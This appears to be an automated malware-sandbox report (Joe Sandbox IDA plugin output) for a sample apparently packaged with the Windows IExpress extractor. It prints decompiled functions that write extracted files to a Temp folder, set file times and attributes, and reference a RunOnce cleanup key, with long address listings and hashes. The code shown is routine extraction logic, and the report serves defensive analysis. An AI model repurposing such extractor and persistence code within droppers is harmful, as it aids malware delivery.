                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 849931509-702805525
                                                                                                                                                                                                      • Opcode ID: 392d137ed8c75b37c47ea150c89e92e52b6addf88517f96681166af6bdaf0085
                                                                                                                                                                                                      • Instruction ID: 2ceefc8bcd7c9c06d478847fdc9cd7d400d15c866e73a207ad68a71a871e03e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 392d137ed8c75b37c47ea150c89e92e52b6addf88517f96681166af6bdaf0085
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E04F34590318BFEB21CB92ED0EF5E7B6AF750745F1401A8BA0CB0060EB615A98D715
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E74CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0xe791d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E00E74E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E00E76CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xe78584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xe791e4;
                                                                                                                                                                                                      						_t58 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xe791e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe791e4;
                                                                                                                                                                                                      						_t30 = E00E74702( &_v268, 0xe791e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E00E7476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E00E74980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E00E747E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe793f4 =  *0xe793f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xe791e4;
                                                                                                                                                                                                      						_t63 = 0xe791e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xe791e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe791e4;
                                                                                                                                                                                                      						_t30 = E00E74702( &_v268, 0xe791e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E00E74C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E00E74B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E00E74B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x00e74e25
                                                                                                                                                                                                      0x00e74e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e33
                                                                                                                                                                                                      0x00e74e38
                                                                                                                                                                                                      0x00e74e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e40
                                                                                                                                                                                                      0x00e74e51
                                                                                                                                                                                                      0x00e74e56
                                                                                                                                                                                                      0x00e74e5b
                                                                                                                                                                                                      0x00e74e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e6a
                                                                                                                                                                                                      0x00e74e6f
                                                                                                                                                                                                      0x00e74e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e77
                                                                                                                                                                                                      0x00e74e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74e7d
                                                                                                                                                                                                      0x00e74d25
                                                                                                                                                                                                      0x00e74d25
                                                                                                                                                                                                      0x00e74d28
                                                                                                                                                                                                      0x00e74d36
                                                                                                                                                                                                      0x00e74d3b
                                                                                                                                                                                                      0x00e74d40
                                                                                                                                                                                                      0x00e74d40
                                                                                                                                                                                                      0x00e74d42
                                                                                                                                                                                                      0x00e74d43
                                                                                                                                                                                                      0x00e74d43
                                                                                                                                                                                                      0x00e74d47
                                                                                                                                                                                                      0x00e74d4a
                                                                                                                                                                                                      0x00e74d4a
                                                                                                                                                                                                      0x00e74d4c
                                                                                                                                                                                                      0x00e74d4f
                                                                                                                                                                                                      0x00e74d4f
                                                                                                                                                                                                      0x00e74d51
                                                                                                                                                                                                      0x00e74d52
                                                                                                                                                                                                      0x00e74d52
                                                                                                                                                                                                      0x00e74d56
                                                                                                                                                                                                      0x00e74d5b
                                                                                                                                                                                                      0x00e74d5d
                                                                                                                                                                                                      0x00e74d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d67
                                                                                                                                                                                                      0x00e74d6f
                                                                                                                                                                                                      0x00e74d74
                                                                                                                                                                                                      0x00e74d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d7c
                                                                                                                                                                                                      0x00e74d84
                                                                                                                                                                                                      0x00e74d89
                                                                                                                                                                                                      0x00e74d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d94
                                                                                                                                                                                                      0x00e74d99
                                                                                                                                                                                                      0x00e74d9e
                                                                                                                                                                                                      0x00e74da1
                                                                                                                                                                                                      0x00e74daa
                                                                                                                                                                                                      0x00e74daa
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74da3
                                                                                                                                                                                                      0x00e74db5
                                                                                                                                                                                                      0x00e74dbb
                                                                                                                                                                                                      0x00e74dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74dc3
                                                                                                                                                                                                      0x00e74dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74dc5
                                                                                                                                                                                                      0x00e74dbd
                                                                                                                                                                                                      0x00e74d2a
                                                                                                                                                                                                      0x00e74d2a
                                                                                                                                                                                                      0x00e74d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74d2d
                                                                                                                                                                                                      0x00e74cf8
                                                                                                                                                                                                      0x00e74cfd
                                                                                                                                                                                                      0x00e74d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00E74DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00E74DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-1193786559
                                                                                                                                                                                                      • Opcode ID: a8afe198cf709b26f545381988f3de396ed4fb5eabf12fea00bab410b55458c6
                                                                                                                                                                                                      • Instruction ID: d4861a6489d6ae810cb4458c47c921dc3021c03570a382f60164912fe89bb709
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8afe198cf709b26f545381988f3de396ed4fb5eabf12fea00bab410b55458c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A44125B62001028BCB369F38E9446F573A5EB45308B04EA69D9CEB71D5DB71DE8AC750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xe78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xe78d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E74C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E74C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E74C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 1457b259106b2c1d2baf15e5a0c940f97593c1293e7e87fd9b1ca984fa01a1c9
                                                                                                                                                                                                      • Instruction ID: 0d82a3195164e36523661d5fb46fbece79f79737d8a5f953b167599841426f17
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1457b259106b2c1d2baf15e5a0c940f97593c1293e7e87fd9b1ca984fa01a1c9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F096B260110C6FAB25DFB5CC48DBBB7ADEB54344744453BA51DE1090EB30D954C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E7487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E7490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00E74A23,?,00E74F67,*MEMCAB,00008000,00000180), ref: 00E748DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00E74F67,*MEMCAB,00008000,00000180), ref: 00E74902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: d7796819f2443a314af861f746251513c546fe50785c484025e82032612c7631
                                                                                                                                                                                                      • Instruction ID: 7a97adfb41707dfa9e523afa417d5f3f05cf47553c7909c5dfa61b7b5450f1f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7796819f2443a314af861f746251513c546fe50785c484025e82032612c7631
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 270178E3E126342AF22880295C88FB7440CCBDA635F1A5230BEAEB61D1D2644C0482E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E74AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xe7858c; // 0x268
                                                                                                                                                                                                      				_t9 = E00E73680(_t20);
                                                                                                                                                                                                      				if( *0xe791d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xe78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xe79400; // 0x11eea6
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xe79400 = _t15;
                                                                                                                                                                                                      							if( *0xe78184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xe78584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe793f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E73680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E7369F
                                                                                                                                                                                                        • Part of subcall function 00E73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736B2
                                                                                                                                                                                                        • Part of subcall function 00E73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E74B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 7db221414663c257b4908a78865e1de0b2398c8caaf87293c79176c25893524e
                                                                                                                                                                                                      • Instruction ID: fb23d2d4b2e74574d40a8dfecf0e070aba4ca2bf677c5707e348fcd7a5f227eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7db221414663c257b4908a78865e1de0b2398c8caaf87293c79176c25893524e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001A971240201AFDB14CF6AEC09BA6B769AB44729F089225E93DB71E1CB30CC95CB80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E7658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xe78b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xe78b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E00E716B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(00E78B3E,00E78B3F,00000001,00E78B3E,-00000003,?,00E760EC,00E71140,?), ref: 00E765BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
